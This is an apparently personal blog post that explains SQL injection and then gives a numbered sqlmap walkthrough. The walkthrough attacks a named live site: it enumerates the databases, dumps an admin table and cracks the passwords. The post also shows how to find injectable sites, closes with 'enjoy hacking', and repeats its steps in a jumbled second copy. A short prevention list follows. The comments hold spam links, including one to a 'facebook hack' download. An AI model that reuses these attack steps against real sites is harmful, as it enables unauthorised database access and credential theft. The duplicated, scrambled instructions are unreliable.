Posts
HACKING A WEBSITE USING SQL INJECTION
what is sql Injection?
SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.
In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.
How does it cause Vernerabilites?
It can lead to vulnerabilities because attackers can send values to an application that they know will be interpolated into a SQL string. By being very clever, they can manipulate the result of queries, reading data or even changing data that they shouldn't be allowed to do.
How to Use it in Backtrack?
1) open a terminal in backtrack 5
2) type cd /pentest/database/sqlmap
3) then type this python sqlmap.py -u http://mappn.com/game.php?id=9 --dbs
4) http://mappn.com/game.php?id=9 its the website that we are to going to hack
5) id=9 is vernurable that is its easy to hack
6) [*] information_schema
[*] us_mappn
these are the 2 avilable database in the website
7) then search for tables and columns
8) python sqlmap.py -u http://mappn.com/game.php?id=9 -D (database name) --tables
9) leave information_schema its the database that will be available for all website
10) then finding system admin file
11) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin --columns
12) we already found admin file now we are getting the info of admin file
13) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin -U test --dump
14) then using common default dictionary method we are cracking the password
15) now the user id and the password has been cracked
now
how to find vernurable web sites
go to this http://mappn.com/game.php?id=9 put (')
mappn.com/game.php?id=9' now press enter
nw see sql error will occur now this is vernurable
thank you and enjoy hacking
who to prevent sql attack?
what is sql Injection?
SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.
In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.
How does it cause Vernerabilites?
It can lead to vulnerabilities because attackers can send values to an application that they know will be interpolated into a SQL string. By being very clever, they can manipulate the result of queries, reading data or even changing data that they shouldn't be allowed to do.
How to Use it in Backtrack?
1. Open Terminal and go to sqlmap Dir:
- cd /pentest/web/scanners/sqlmap/
2. To use it type :
-python sqlmap.py -u http://Target.com/index.php?id=1 --dbs ( For database )
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) --table
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) --colum
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) -C (columname) --dump
1) open a terminal in backtrack 5
2) type cd /pentest/database/sqlmap
4) http://mappn.com/game.php?id=9 its the website that we are to going to hack
5) id=9 is vernurable that is its easy to hack
[*] us_mappn
these are the 2 avilable database in the website
7) then search for tables and columns
8) python sqlmap.py -u http://mappn.com/game.php?id=9 -D (database name) --tables
9) leave information_schema its the database that will be available for all website
11) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin --columns
12) we already found admin file now we are getting the info of admin file
15) now the user id and the password has been cracked
now
how to find vernurable web sites
go to this http://mappn.com/game.php?id=9 put (')
mappn.com/game.php?id=9' now press enter
nw see sql error will occur now this is vernurable
thank you and enjoy hacking
who to prevent sql attack?
- Strict type checking ( Don’t trust what the user enters )
- If you expect user name to be entered, then validate whether it contains only alpha numerals.
- Escape or filter the special characters and user inputs.
- Use prepared statements to execute the queries.
- Don’t allow multiple queries to be executed on a single statement.
- Don’t leak the database information to the end user by displaying the “syntax errors”, etc..
Hi, Good Job.
ReplyDeleteBTW whats your contribution in this?
-Prasanna
He is the Coder.. The Designer.. Engineer.. Builder.. The All in All Azhagu Raja..
ReplyDelete
ReplyDeletehttp://kudabox.com/facebook-hack-2013-v3-1-rar
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
http://kudabox.com/facebook-hack-2013-v3-1-rar
http://isattamatka.net/
ReplyDelete